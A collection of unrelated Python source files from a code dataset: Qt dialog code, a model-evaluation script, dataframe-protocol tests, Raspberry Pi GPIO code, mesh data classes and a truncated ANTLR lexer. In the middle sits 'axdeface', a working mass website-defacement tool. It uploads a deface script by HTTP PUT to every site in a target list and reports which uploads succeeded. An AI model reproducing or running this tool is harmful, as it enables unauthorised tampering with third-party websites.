self.cboReason.setItemText(2, _translate("RevokeMnDlg", "2: Compromised Keys"))
self.cboReason.setItemText(3, _translate("RevokeMnDlg", "3: Change of Keys (Not compromised)"))
self.lblIP.setText(_translate("RevokeMnDlg", "Revocation reason"))
self.btnCancel.setText(_translate("RevokeMnDlg", "Cancel"))
self.btnSendRevokeTx.setText(_translate("RevokeMnDlg", "Send Revoke Transaction"))
self.btnClose.setText(_translate("RevokeMnDlg", "Close"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
RevokeMnDlg = QtWidgets.QDialog()
ui = Ui_RevokeMnDlg()
ui.setupUi(RevokeMnDlg)
RevokeMnDlg.show()
sys.exit(app.exec_())
|
StarcoderdataPython
|
18995
|
"""
The system RoBERTa trains on the AGB dataset with softmax loss function.
At every 1000 training steps, the model is evaluated on the AGB dev set.
"""
from torch.utils.data import DataLoader
from sentence_transformers import models, losses
from sentence_transformers import SentencesDataset, LoggingHandler, SentenceTransformer
from sentence_transformers.evaluation import EmbeddingSimilarityEvaluator, LabelGenerationEvaluator
from sentence_transformers.readers import *
import logging
import torch
import os
#### Just some code to print debug information to stdout
logging.basicConfig(format='%(asctime)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
level=logging.INFO,
handlers=[LoggingHandler()])
#### /print debug information to stdout
# # Read the dataset
root_dir = "/data/salmasian/sentence_transformers"
for i in range(1, 6):
run_dir = os.path.join(root_dir, f"run{i}")
for model_dir in sorted(os.listdir(run_dir)):
curr_dir = os.path.join(run_dir, model_dir)
# skip non-consecutive models
if f"og_{i}" not in curr_dir:
continue
print(f"Working on model {model_dir}")
# Delete when we re-evaluate...
labels_file = os.path.join(curr_dir, "prediction_labels.csv")
pred_file = os.path.join(curr_dir, "prediction_results.csv")
if os.path.isfile(labels_file):
os.remove(os.path.join(curr_dir, "prediction_labels.csv"))
if os.path.isfile(pred_file):
os.remove(os.path.join(curr_dir, "prediction_results.csv"))
# Model path
model_save_path = curr_dir
batch_size = 24
agb_reader = TestAGBReader('datasets/og-test')
train_num_labels = agb_reader.get_num_labels()
model = SentenceTransformer(model_save_path, device="cuda:0")
train_loss = losses.SoftmaxLoss(model=model,
sentence_embedding_dimension=model.get_sentence_embedding_dimension(),
num_labels=train_num_labels)
train_loss.classifier = torch.load(os.path.join(model_save_path, "2_Softmax/pytorch_model.bin"))
print("test")
test_dir = "/data/daumiller/sentence-transformers/examples/datasets/og-test"
for fn in sorted(os.listdir(test_dir)):
examples = agb_reader.get_examples(fn)
if not examples:
continue
# Hack to avoid problems with docs almost as long as batch size
if len(examples) == batch_size + 1:
batch_size_used = batch_size - 3
else:
batch_size_used = batch_size
test_data = SentencesDataset(examples=examples, model=model, shorten=True)
test_dataloader = DataLoader(test_data, shuffle=False, batch_size=batch_size_used)
evaluator = LabelGenerationEvaluator(test_dataloader, softmax_model=train_loss)
model.evaluate(evaluator, model_save_path)
|
StarcoderdataPython
|
1703950
|
<reponame>audacious-software/Simple-Messaging-Dialog-Engine-Support
def quicksilver_tasks():
return [
('simple_messaging_send_pending_messages', '--no-color', 5,),
('nudge_active_sessions', '--no-color', 10,),
]
|
StarcoderdataPython
|
3271451
|
<gh_stars>0
from pyjenkins.job import Job, JobStatus
class Jenkins(object):
def __init__(self):
self._jobs_rota = [[Job('spam', JobStatus.OK),
Job('eggs', JobStatus.OK)],
[Job('spam', JobStatus.FAILING),
Job('eggs', JobStatus.DISABLED)],
]
self._next_jobs = 0
def list_jobs(self):
"""
@rtype: None
"""
result = self._jobs_rota[self._next_jobs]
self._next_jobs = self._next_jobs + 1
if self._next_jobs is len(self._jobs_rota):
self._next_jobs = 0
return result
def enable_job(self, job_name):
job = self._find_job(job_name)
if job:
job.status = JobStatus.OK
return True
def disable_job(self, job_name):
job = self._find_job(job_name)
if job:
job.status = JobStatus.DISABLED
return False
def _find_job(self, job_name):
result = None
jobs = [job for job in self._jobs_rota[self._next_jobs] if job.name == job_name]
if jobs != []:
result = jobs[0]
return result
|
StarcoderdataPython
|
85922
|
<reponame>sethvargo/vaex
import numpy as np
import pyarrow as pa
import pytest
from typing import Any, Optional, Tuple, Dict, Iterable, Sequence
DataFrameObject = Any
ColumnObject = Any
import vaex
from common import *
from vaex.dataframe_protocol import _from_dataframe_to_vaex, _DtypeKind, _VaexBuffer, _VaexColumn, _VaexDataFrame
def test_float_only(df_factory):
df = df_factory(x=[1.5, 2.5, 3.5], y=[9.2, 10.5, 11.8])
df2 = _from_dataframe_to_vaex(df.__dataframe__())
assert df2.x.tolist() == df.x.tolist()
assert df2.y.tolist() == df.y.tolist()
assert df2.__dataframe__().get_column_by_name("x").null_count == 0
assert df2.__dataframe__().get_column_by_name("y").null_count == 0
assert_dataframe_equal(df.__dataframe__(), df)
def test_mixed_intfloat(df_factory):
df = df_factory(x=[1, 2, 0], y=[9.2, 10.5, 11.8])
df2 = _from_dataframe_to_vaex(df.__dataframe__())
assert df2.x.tolist() == df.x.tolist()
assert df2.y.tolist() == df.y.tolist()
assert df2.__dataframe__().get_column_by_name("x").null_count == 0
assert df2.__dataframe__().get_column_by_name("y").null_count == 0
assert_dataframe_equal(df.__dataframe__(), df)
def test_mixed_intfloatbool(df_factory):
df = df_factory(x=np.array([True, True, False]), y=np.array([1, 2, 0]), z=np.array([9.2, 10.5, 11.8]))
df2 = _from_dataframe_to_vaex(df.__dataframe__())
assert df2.x.tolist() == df.x.tolist()
assert df2.y.tolist() == df.y.tolist()
assert df2.z.tolist() == df.z.tolist()
assert df2.__dataframe__().get_column_by_name("x").null_count == 0
assert df2.__dataframe__().get_column_by_name("y").null_count == 0
assert df2.__dataframe__().get_column_by_name("z").null_count == 0
# Additionl tests for _VaexColumn
assert df2.__dataframe__().get_column_by_name("x")._allow_copy == True
assert df2.__dataframe__().get_column_by_name("x").size == 3
assert df2.__dataframe__().get_column_by_name("x").offset == 0
assert df2.__dataframe__().get_column_by_name("z").dtype[0] == 2 # 2: float64
assert df2.__dataframe__().get_column_by_name("z").dtype[1] == 64 # 64: float64
assert df2.__dataframe__().get_column_by_name("z").dtype == (2, 64, "<f8", "=")
with pytest.raises(TypeError):
assert df2.__dataframe__().get_column_by_name("y").describe_categorical
if df2['y'].dtype.is_arrow:
assert df2.__dataframe__().get_column_by_name("y").describe_null == (3, 0)
else:
assert df2.__dataframe__().get_column_by_name("y").describe_null == (0, None)
assert_dataframe_equal(df.__dataframe__(), df)
def test_mixed_missing(df_factory_arrow):
df = df_factory_arrow(x=np.array([True, None, False, None, True]), y=np.array([None, 2, 0, 1, 2]), z=np.array([9.2, 10.5, None, 11.8, None]))
df2 = _from_dataframe_to_vaex(df.__dataframe__())
assert df.__dataframe__().metadata == df2.__dataframe__().metadata
assert df["x"].tolist() == df2["x"].tolist()
assert not df2["x"].is_masked
assert df2.__dataframe__().get_column_by_name("x").null_count == 2
assert df["x"].dtype == df2["x"].dtype
assert df["y"].tolist() == df2["y"].tolist()
assert not df2["y"].is_masked
assert df2.__dataframe__().get_column_by_name("y").null_count == 1
assert df["y"].dtype == df2["y"].dtype
assert df["z"].tolist() == df2["z"].tolist()
assert not df2["z"].is_masked
assert df2.__dataframe__().get_column_by_name("z").null_count == 2
assert df["z"].dtype == df2["z"].dtype
assert_dataframe_equal(df.__dataframe__(), df)
def test_missing_from_masked(df_factory_numpy):
df = df_factory_numpy(
x=np.ma.array([1, 2, 3, 4, 0], mask=[0, 0, 0, 1, 1], dtype=int),
y=np.ma.array([1.5, 2.5, 3.5, 4.5, 0], mask=[False, True, True, True, False], dtype=float),
z=np.ma.array([True, False, True, True, True], mask=[1, 0, 0, 1, 0], dtype=bool),
)
df2 = _from_dataframe_to_vaex(df.__dataframe__())
assert df.__dataframe__().metadata == df2.__dataframe__().metadata
assert df["x"].tolist() == df2["x"].tolist()
assert not df2["x"].is_masked
assert df2.__dataframe__().get_column_by_name("x").null_count == 2
assert df["x"].dtype == df2["x"].dtype
assert df["y"].tolist() == df2["y"].tolist()
assert not df2["y"].is_masked
assert df2.__dataframe__().get_column_by_name("y").null_count == 3
assert df["y"].dtype == df2["y"].dtype
assert df["z"].tolist() == df2["z"].tolist()
assert not df2["z"].is_masked
assert df2.__dataframe__().get_column_by_name("z").null_count == 2
assert df["z"].dtype == df2["z"].dtype
assert_dataframe_equal(df.__dataframe__(), df)
def test_categorical():
df = vaex.from_arrays(year=[2012, 2013, 2015, 2019], weekday=[0, 1, 4, 6])
df = df.categorize("year", min_value=2012, max_value=2019)
df = df.categorize("weekday", labels=["Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"])
# Some detailed testing for correctness of dtype and null handling:
col = df.__dataframe__().get_column_by_name("year")
assert col.dtype[0] == _DtypeKind.CATEGORICAL
assert col.describe_categorical == (False, True, {0: 2012, 1: 2013, 2: 2014, 3: 2015, 4: 2016, 5: 2017, 6: 2018, 7: 2019})
assert col.describe_null == (0, None)
assert col.dtype == (23, 64, "u", "=")
col2 = df.__dataframe__().get_column_by_name("weekday")
assert col2.dtype[0] == _DtypeKind.CATEGORICAL
assert col2.describe_categorical == (False, True, {0: "Mon", 1: "Tue", 2: "Wed", 3: "Thu", 4: "Fri", 5: "Sat", 6: "Sun"})
assert col2.describe_null == (0, None)
assert col2.dtype == (23, 64, "u", "=")
df2 = _from_dataframe_to_vaex(df.__dataframe__())
assert df2["year"].tolist() == [2012, 2013, 2015, 2019]
assert df2["weekday"].tolist() == ["Mon", "Tue", "Fri", "Sun"]
assert_dataframe_equal(df.__dataframe__(), df)
def test_arrow_dictionary():
indices = pa.array([0, 1, 0, 1, 2, 0, 1, 2])
dictionary = pa.array(["foo", "bar", "baz"])
dict_array = pa.DictionaryArray.from_arrays(indices, dictionary)
df = vaex.from_arrays(x=dict_array)
# Some detailed testing for correctness of dtype and null handling:
col = df.__dataframe__().get_column_by_name("x")
assert col.dtype[0] == _DtypeKind.CATEGORICAL
assert col.describe_categorical == (False, True, {0: "foo", 1: "bar", 2: "baz"})
if df['x'].dtype.is_arrow:
assert col.describe_null == (3, 0)
else:
assert col.describe_null == (0, None)
assert col.dtype == (23, 64, "u", "=")
df2 = _from_dataframe_to_vaex(df.__dataframe__())
assert df2.x.tolist() == df.x.tolist()
assert df2.__dataframe__().get_column_by_name("x").null_count == 0
assert_dataframe_equal(df.__dataframe__(), df)
def test_arrow_dictionary_missing():
indices = pa.array([0, 1, 2, 0, 1], mask=np.array([0, 1, 1, 0, 0], dtype=bool))
dictionary = pa.array(["aap", "noot", "mies"])
dict_array = pa.DictionaryArray.from_arrays(indices, dictionary)
df = vaex.from_arrays(x=dict_array)
# Some detailed testing for correctness of dtype and null handling:
col = df.__dataframe__().get_column_by_name("x")
assert col.dtype[0] == _DtypeKind.CATEGORICAL
assert col.describe_categorical == (False, True, {0: "aap", 1: "noot", 2: "mies"})
df2 = _from_dataframe_to_vaex(df.__dataframe__())
assert df2.x.tolist() == df.x.tolist()
assert df2.__dataframe__().get_column_by_name("x").null_count == 2
assert df["x"].dtype.index_type == df2["x"].dtype.index_type
assert_dataframe_equal(df.__dataframe__(), df)
def test_string():
df = vaex.from_dict({"A": ["a", None, "cdef", "", "g"]})
col = df.__dataframe__().get_column_by_name("A")
assert col._col.tolist() == df.A.tolist()
assert col.size == 5
assert col.null_count == 1
assert col.dtype[0] == _DtypeKind.STRING
assert col.describe_null == (3,0)
df2 = _from_dataframe_to_vaex(df.__dataframe__())
assert df2.A.tolist() == df.A.tolist()
assert df2.__dataframe__().get_column_by_name("A").null_count == 1
assert df2.__dataframe__().get_column_by_name("A").describe_null == (3,0)
assert df2.__dataframe__().get_column_by_name("A").dtype[0] == _DtypeKind.STRING
df_sliced = df[1:]
col = df_sliced.__dataframe__().get_column_by_name("A")
assert col.size == 4
assert col.null_count == 1
assert col.dtype[0] == _DtypeKind.STRING
assert col.describe_null == (3,0)
df2 = _from_dataframe_to_vaex(df_sliced.__dataframe__())
assert df2.A.tolist() == df_sliced.A.tolist()
assert df2.__dataframe__().get_column_by_name("A").null_count == 1
assert df2.__dataframe__().get_column_by_name("A").describe_null == (3,0)
assert df2.__dataframe__().get_column_by_name("A").dtype[0] == _DtypeKind.STRING
def test_no_mem_copy():
strings = ["a", "", "cdef", "", "g"]
# data for above string array
dbuf = np.array([ 97, 99, 100, 101, 102, 103], dtype='uint8')
obuf = np.array([0, 1, 1, 5, 5, 6], dtype='int64')
length = 5
buffers = [None, pa.py_buffer(obuf), pa.py_buffer(dbuf)]
s = pa.Array.from_buffers(pa.large_utf8(), length, buffers)
x = np.arange(0, 5)
df = vaex.from_arrays(x=x, s=s)
df2 = _from_dataframe_to_vaex(df.__dataframe__())
# primitive data
x[0] = 999
assert df2.x.tolist() == [999, 1, 2, 3, 4]
# strings
assert df.s.tolist() == strings
assert df2.s.tolist() == strings
# mutate the buffer data (which actually arrow and vaex both don't support/want)
strings[0] = "b"
dbuf[0] += 1
assert df.s.tolist() == strings
assert df2.s.tolist() == strings
def test_object():
df = vaex.from_arrays(x=np.array([None, True, False]))
col = df.__dataframe__().get_column_by_name("x")
assert col._col.tolist() == df.x.tolist()
assert col.size == 3
with pytest.raises(ValueError):
assert col.dtype
with pytest.raises(ValueError):
assert col.describe_null
def test_virtual_column():
df = vaex.from_arrays(x=np.array([True, True, False]), y=np.array([1, 2, 0]), z=np.array([9.2, 10.5, 11.8]))
df.add_virtual_column("r", "sqrt(y**2 + z**2)")
df2 = _from_dataframe_to_vaex(df.__dataframe__())
assert df2.r.tolist() == df.r.tolist()
def test_VaexBuffer():
x = np.ndarray(shape=(5,), dtype=float, order="F")
x_buffer = _VaexBuffer(x)
assert x_buffer.bufsize == 5 * x.itemsize
assert x_buffer.ptr == x.__array_interface__["data"][0]
assert x_buffer.__dlpack_device__() == (1, None)
assert x_buffer.__repr__() == f"VaexBuffer({{'bufsize': {5*x.itemsize}, 'ptr': {x.__array_interface__['data'][0]}, 'device': 'CPU'}})"
with pytest.raises(NotImplementedError):
assert x_buffer.__dlpack__()
def test_VaexDataFrame():
df = vaex.from_arrays(x=np.array([True, True, False]), y=np.array([1, 2, 0]), z=np.array([9.2, 10.5, 11.8]))
df2 = df.__dataframe__()
assert df2._allow_copy == True
assert df2.num_columns() == 3
assert df2.num_rows() == 3
assert df2.num_chunks() == 1
assert df2.column_names() == ["x", "y", "z"]
assert df2.get_column(0)._col.tolist() == df.x.tolist()
assert df2.get_column_by_name("y")._col.tolist() == df.y.tolist()
for col in df2.get_columns():
assert col._col.tolist() == df[col._col.expression].tolist()
assert df2.select_columns((0, 2))._df[:, 0].tolist() == df2.select_columns_by_name(("x", "z"))._df[:, 0].tolist()
assert df2.select_columns((0, 2))._df[:, 1].tolist() == df2.select_columns_by_name(("x", "z"))._df[:, 1].tolist()
def test_chunks(df_factory):
x = np.arange(10)
df = df_factory(x=x)
df2 = df.__dataframe__()
chunk_iter = iter(df2.get_chunks(3))
chunk = next(chunk_iter)
assert chunk.num_rows() == 4
chunk = next(chunk_iter)
assert chunk.num_rows() == 4
chunk = next(chunk_iter)
assert chunk.num_rows() == 2
with pytest.raises(StopIteration):
chunk = next(chunk_iter)
def assert_buffer_equal(buffer_dtype: Tuple[_VaexBuffer, Any], vaexcol: vaex.expression.Expression):
buf, dtype = buffer_dtype
pytest.raises(NotImplementedError, buf.__dlpack__)
assert buf.__dlpack_device__() == (1, None)
assert dtype[1] == vaexcol.dtype.index_type.numpy.itemsize * 8
if not isinstance(vaexcol.values, np.ndarray) and isinstance(vaexcol.values.type, pa.DictionaryType):
assert dtype[2] == vaexcol.index_values().dtype.numpy.str
else:
assert dtype[2] == vaexcol.dtype.numpy.str
def assert_column_equal(col: _VaexColumn, vaexcol: vaex.expression.Expression):
assert col.size == vaexcol.df.count("*")
assert col.offset == 0
assert col.null_count == vaexcol.countmissing()
assert_buffer_equal(col._get_data_buffer(), vaexcol)
def assert_dataframe_equal(dfo: DataFrameObject, df: vaex.dataframe.DataFrame):
assert dfo.num_columns() == len(df.columns)
assert dfo.num_rows() == len(df)
assert dfo.column_names() == list(df.get_column_names())
for col in df.get_column_names():
assert_column_equal(dfo.get_column_by_name(col), df[col])
|
StarcoderdataPython
|
3269546
|
<filename>devices/help_button/help_button.py
# -*- coding: utf-8 -*-
import RPi.GPIO as GPIO
from time import sleep
from call_client import CallClient
RED_LED_GPIO = 4
RED_TACT_GPIO = 17
GPIO.setmode(GPIO.BCM)
GPIO.setup(RED_LED_GPIO, GPIO.OUT)
GPIO.setup(RED_TACT_GPIO, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
is_called = False
call_client = CallClient()
try:
print('--- start program ---')
while True:
if GPIO.input(RED_TACT_GPIO) == GPIO.HIGH:
if not is_called:
is_called = True
print("red switch on")
GPIO.output(RED_LED_GPIO, GPIO.HIGH)
token = call_client.get_token()
call_client.call(token)
else:
is_called = False
print("red switch off")
GPIO.output(RED_LED_GPIO, GPIO.LOW)
token = call_client.get_token()
call_client.call(token, True)
sleep(2)
sleep(0.01)
except KeyboardInterrupt:
pass
finally:
GPIO.output(RED_LED_GPIO, GPIO.LOW)
GPIO.cleanup()
print('--- stop program ---')
|
StarcoderdataPython
|
1746806
|
<reponame>jearistiz/guane-intern-fastapi<gh_stars>10-100
from app.config import sttgs
from app.utils.http_request import post_to_uri
def test_post_to_uri():
task_complexity = 0
task_query_url = (
sttgs.get('GUANE_WORKER_URI') + f'?task_complexity={task_complexity}'
)
response = post_to_uri(
task_query_url,
message={'task_complexity': task_complexity}
)
assert response.status_code == 201
assert response.json()['status']
|
StarcoderdataPython
|
3362651
|
from __future__ import annotations
from numpy import array, ndarray
class UGridNetwork1D:
"""This class is used for define/put/inquire/get Network1D data
Attributes:
name (str): The network name.
node_x (ndarray): The x-coordinates of the network node.
node_y (ndarray): The y-coordinates of the network node.
edge_node (ndarray): The nodes defining each branch.
edge_length (ndarray): The edge lengths.
geometry_nodes_x (ndarray): The geometry nodes x coordinates.
geometry_nodes_y (ndarray): The geometry nodes y coordinates.
num_edge_geometry_nodes (ndarray): The number of geometry node on each branch.
edge_order (ndarray): The order of the branches.
node_id (str): The node names ids.
node_name_long (str): The node long names.
edge_id (list): The name of the branches.
edge_long_name (list): The long name of the branches.
"""
def __init__(
self,
name,
node_x,
node_y,
edge_node,
edge_length,
geometry_nodes_x,
geometry_nodes_y,
num_edge_geometry_nodes,
edge_order=array([]),
node_id=[],
node_name_long=[],
edge_id=[],
edge_long_name=[],
):
self.name: str = name
self.node_x: ndarray = node_x
self.node_y: ndarray = node_y
self.node_id: list = node_id
self.node_long_name: list = node_name_long
self.edge_node: ndarray = edge_node
self.edge_length: ndarray = edge_length
self.edge_order: ndarray = edge_order
self.edge_id: list = edge_id
self.edge_long_name: list = edge_long_name
self.geometry_nodes_x: ndarray = geometry_nodes_x
self.geometry_nodes_y: ndarray = geometry_nodes_y
self.num_edge_geometry_nodes = num_edge_geometry_nodes
self.is_spherical: bool = False
self.start_index: int = 0
class UGridMesh1D:
"""This class is used for define/put/inquire/get Mesh1D data
Attributes:
name (c_char_p): The mesh name.
network_name (c_char_p): The x-coordinates of the network node.
node_x (ndarray): The node x coordinate.
node_y (ndarray): The node y coordinate.
edge_node (ndarray): The edge node connectivity.
node_edge_id (ndarray): The network edge id where every node lies.
node_edge_offset (ndarray): The offset of each node on the network edge.
node_name_id (list): A list of node names ids.
node_name_long (c_char_p): A list of node long names.
edge_edge_id (ndarray): The network edge id where every edge lies.
edge_edge_offset (ndarray): The offset of each edge on the network edge.
edge_x (ndarray): The edge x coordinate.
edge_y (ndarray): The edge y coordinate.
double_fill_value (c_double): The fill value for array of doubles.
int_fill_value (c_int): The fill value for array of integers.
"""
def __init__(
self,
name,
network_name,
node_edge_id,
node_edge_offset,
node_x=array([]),
node_y=array([]),
edge_node=array([]),
edge_edge_id=array([]),
edge_edge_offset=array([]),
edge_x=array([]),
edge_y=array([]),
node_name_id=[],
node_name_long=[],
double_fill_value=-999.0,
int_fill_value=-999,
):
self.name: str = name
self.network_name: str = network_name
self.node_x: ndarray = node_x
self.node_y: ndarray = node_y
self.edge_node: ndarray = edge_node
self.node_edge_id: ndarray = node_edge_id
self.node_edge_offset: ndarray = node_edge_offset
self.node_name_id: list = node_name_id
self.node_name_long: list = node_name_long
self.edge_edge_id: ndarray = edge_edge_id
self.edge_edge_offset: ndarray = edge_edge_offset
self.edge_x: ndarray = edge_x
self.edge_y: ndarray = edge_y
self.is_spherical: bool = False
self.start_index: int = 0
self.double_fill_value: float = double_fill_value
self.int_fill_value: int = int_fill_value
class UGridMesh2D:
"""This class is used for define/put/inquire/get Mesh2D data
Attributes:
name (str): The mesh name.
edge_nodes (ndarray): The nodes composing each mesh 2d edge.
face_nodes (ndarray): The nodes composing each mesh 2d face.
nodes_per_face (ndarray): The nodes composing each mesh 2d face.
node_x (ndarray): The x-coordinates of the nodes.
node_y (ndarray): The y-coordinates of the nodes.
edge_x (ndarray): The x-coordinates of the mesh edges' middle points.
edge_y (ndarray): The x-coordinates of the mesh edges' middle points.
face_x (ndarray): The x-coordinates of the mesh faces' mass centers.
face_y (ndarray): The y-coordinates of the mesh faces' mass centers.
edge_face (ndarray): The edges composing each face.
face_edge (ndarray): For each face, the edges composing it.
face_face (ndarray): For each face, the neighboring faces.
node_z (ndarray): The node z coordinates.
edge_z (ndarray): The edge z coordinates.
face_z (ndarray): The face z coordinates.
layer_zs (ndarray): The z coordinates of a layer.
interface_zs (ndarray): The z coordinates of a layer interface.
boundary_node_connectivity (ndarray): To be detailed.
volume_coordinates (ndarray): To be detailed.
start_index (int): The start index used in arrays using indices, such as in the branch_node array.
num_face_nodes_max (int): The maximum number of face nodes.
is_spherical (c_int): 1 if coordinates are in a spherical system, 0 otherwise.
double_fill_value (c_double): The fill value for array of doubles.
int_fill_value (c_int): The fill value for array of integers.
"""
def __init__(
self,
name,
node_x,
node_y,
edge_node,
face_node=array([]),
edge_x=array([]),
edge_y=array([]),
face_x=array([]),
face_y=array([]),
edge_face=array([]),
face_edge=array([]),
face_face=array([]),
node_z=array([]),
edge_z=array([]),
face_z=array([]),
layer_zs=array([]),
interface_zs=array([]),
boundary_node_connectivity=array([]),
volume_coordinates=array([]),
start_index=0,
num_face_nodes_max=4,
is_spherical=False,
double_fill_value=-999.0,
int_fill_value=-999,
):
self.name: str = name
self.edge_node: ndarray = edge_node
self.node_x: ndarray = node_x
self.node_y: ndarray = node_y
self.face_node: ndarray = face_node
self.edge_x: ndarray = edge_x
self.edge_y: ndarray = edge_y
self.face_x: ndarray = face_x
self.face_y: ndarray = face_y
self.edge_face: ndarray = edge_face
self.face_edge: ndarray = face_edge
self.face_face: ndarray = face_face
self.node_z: ndarray = node_z
self.edge_z: ndarray = edge_z
self.face_z: ndarray = face_z
self.layer_zs: ndarray = layer_zs
self.interface_zs: ndarray = interface_zs
self.boundary_node_connectivity: ndarray = boundary_node_connectivity
self.volume_coordinates: ndarray = volume_coordinates
self.start_index: int = start_index
self.num_face_nodes_max: int = num_face_nodes_max
self.is_spherical: int = is_spherical
self.double_fill_value: float = double_fill_value
self.int_fill_value: int = int_fill_value
class UGridContacts:
"""This class is used for define/put/inquire/get Contacts data
Attributes:
name (str): The name of the contact entity.
edges (ndarray): The actual contacts, expressed as pair of indices from a mesh index to another mesh index.
contact_type (ndarray): For each contact its type.
contact_name_id (list): The name of each contact.
contact_name_long (list): The long name of each contact.
mesh_from_name (str): The name of the mesh where the contacts start.
mesh_to_name (str): The name of the mesh where the contacts ends.
mesh_from_location (c_int): The location type (node, edge or face) at the contact start.
mesh_to_location (c_int): The location type (node, edge or face) at the contact end.
num_contacts (c_int): The number of contacts.
"""
def __init__(
self,
name,
edges,
mesh_from_name,
mesh_to_name,
contact_type=array([]),
contact_name_id=list,
contact_name_long=list,
mesh_from_location=0,
mesh_to_location=0,
):
self.name: str = name
self.edges: ndarray = edges
self.mesh_from_name: str = mesh_from_name
self.mesh_to_name: str = mesh_to_name
self.contact_type: ndarray = contact_type
self.contact_name_id: list = contact_name_id
self.contact_name_long: list = contact_name_long
self.mesh_from_location: int = mesh_from_location
self.mesh_to_location: int = mesh_to_location
|
StarcoderdataPython
|
4816151
|
#-*- coding: utf-8 -*-
try:
import requests
import os.path
import time
import sys
except ImportError:
exit("install requests and try again ...")
import os
os.system ("clear")
banner = """
\033[31m █████╗ ██╗ ██╗██████╗ \033[0m Author :\033[93m <NAME> Z\033[0m
\033[31m ██╔══██╗╚██╗██╔╝██╔══██╗\033[0m Date :\033[93m 2020-09-16\033[0m
\033[31m ███████║ ╚███╔╝ ██║ ██║\033[0m Tools :\033[93m axdeface V.1.0\033[0m
\033[77m ██╔══██║ ██╔██╗ ██║ ██║\033[0m Github :\033[93m /djunekz\033[0m
\033[77m ██║ ██║██╔╝ ██╗██████╔╝\033[0m irssi :\033[93m CyberPEJAYA\033[0m
\033[77m ╚═╝ ╚═╝╚═╝ ╚═╝╚═════╝ \033[0m Team :\033[93m Surabaya BlackHat Hacker\033[0m
"""
b = '\033[31m'
h = '\033[32m'
m = '\033[00m'
def x(tetew):
ipt = ''
if sys.version_info.major > 2:
ipt = input(tetew)
else:
ipt = raw_input(tetew)
return str(ipt)
def axd(script,target_file="target.txt"):
op = open(script,"r").read()
with open(target_file, "r") as target:
target = target.readlines()
s = requests.Session()
print ("\33[31m[\33[0;32m√\33[0m\33[31m]\33[0m Save File. . .")
print ("\33[31m[\33[0;32m√\33[0m\33[31m]\33[0m Update. . .")
print ("\33[31m[\33[0;32m√\33[0m\33[31m]\33[0m File script \33[0;32mAccepted\33[0m")
print ("\33[31m[\33[77m>\33[0m\33[31m]\33[0m Target [\033[32m%d\033[0m] website"%(len(target)))
print ("\33[31m[\33[33m!\33[0m\33[31m]\33[0m Proses upload file script deface.. . .")
load = '█'
count = 0
for x in range(101):
time.sleep(0.8)
print (f'\r\33[31m[\33[33m!\33[0m\33[31m]\33[0m Uploading file script \33[32m[{load}]\33[0m : \33[32m{x}\33[0m%', end='', flush=True)
count += 1
if count == 3:
count = 0
load += '█'
print ('\n\n\33[31m[\33[0;32m√\33[0m\33[31m]\33[0m Upload Done. . .')
print ('\n\33[31m[\33[33m!\33[0m\33[31m]\33[0m Proses peretasan. . .')
for web in target:
try:
site = web.strip()
if site.startswith("http://") is False:
site = "http://" + site
req = s.put(site+"/"+script,data=op)
if req.status_code < 200 or req.status_code >= 250:
print(m+"["+b+" FAILED!"+m+" ] \33[33;1m%s/%s"%(site,script))
else:
print(m+"["+h+" SUCCESS"+m+" ] \33[32;1m%s/%s"%(site,script))
except requests.exceptions.RequestException:
continue
except KeyboardInterrupt:
print; exit()
def main(__bn__):
print(__bn__)
while True:
try:
a = x("\33[31m[\33[77m>\33[0m\33[31m]\33[0m Ketik nama file script deface : ")
if not os.path.isfile(a):
print ("\33[31m[\33[33m!\33[0m\33[31m]\33[0m file\033[31m %s \033[0mtidak ada didalam folder ini. . ."%(a))
continue
else:
break
except KeyboardInterrupt:
print; exit()
axd(a)
if __name__ == "__main__":
main(banner)
|
StarcoderdataPython
|
140606
|
<gh_stars>0
# Generated from APi.g4 by ANTLR 4.9
from antlr4 import *
from io import StringIO
from typing.io import TextIO
import sys
def serializedATN():
with StringIO() as buf:
buf.write("\3\u608b\ua72a\u8133\ub9ed\u417c\u3be7\u7786\u5964\2\63")
buf.write("\u018f\b\1\4\2\t\2\4\3\t\3\4\4\t\4\4\5\t\5\4\6\t\6\4\7")
buf.write("\t\7\4\b\t\b\4\t\t\t\4\n\t\n\4\13\t\13\4\f\t\f\4\r\t\r")
buf.write("\4\16\t\16\4\17\t\17\4\20\t\20\4\21\t\21\4\22\t\22\4\23")
buf.write("\t\23\4\24\t\24\4\25\t\25\4\26\t\26\4\27\t\27\4\30\t\30")
buf.write("\4\31\t\31\4\32\t\32\4\33\t\33\4\34\t\34\4\35\t\35\4\36")
buf.write("\t\36\4\37\t\37\4 \t \4!\t!\4\"\t\"\4#\t#\4$\t$\4%\t%")
buf.write("\4&\t&\4\'\t\'\4(\t(\4)\t)\4*\t*\4+\t+\4,\t,\4-\t-\4.")
buf.write("\t.\4/\t/\4\60\t\60\4\61\t\61\4\62\t\62\4\63\t\63\4\64")
buf.write("\t\64\4\65\t\65\4\66\t\66\4\67\t\67\48\t8\49\t9\4:\t:")
buf.write("\4;\t;\4<\t<\3\2\3\2\3\3\3\3\3\4\3\4\3\5\3\5\3\6\3\6\3")
buf.write("\7\3\7\3\b\3\b\3\t\3\t\3\n\3\n\3\13\3\13\3\13\3\13\3\13")
buf.write("\3\f\3\f\3\f\3\f\3\f\3\f\3\r\3\r\3\r\3\r\3\r\3\16\3\16")
buf.write("\3\17\3\17\3\20\3\20\3\21\3\21\3\21\3\22\3\22\3\23\3\23")
buf.write("\3\23\3\23\3\23\3\23\3\24\3\24\3\24\3\24\3\24\3\24\3\24")
buf.write("\3\25\3\25\3\25\3\25\3\25\3\25\3\25\3\26\3\26\3\26\3\26")
buf.write("\3\26\3\27\3\27\3\27\3\27\3\27\3\27\3\27\3\30\3\30\3\30")
buf.write("\3\30\3\30\3\30\3\30\3\30\3\30\3\30\3\30\3\30\3\31\3\31")
buf.write("\3\32\3\32\3\33\3\33\3\34\3\34\3\35\3\35\3\35\3\35\3\35")
buf.write("\3\35\3\36\3\36\3\36\3\36\3\36\3\37\3\37\3\37\3\37\3\37")
buf.write("\3\37\3 \3 \3 \3 \3 \3 \3 \3 \3!\3!\3!\3!\3!\3!\3\"\3")
buf.write("\"\3\"\3\"\3\"\3#\3#\3#\3#\3$\3$\3$\3%\3%\3%\3&\3&\3&")
buf.write("\3\'\3\'\3(\3(\5(\u0110\n(\3)\3)\3)\3)\7)\u0116\n)\f)")
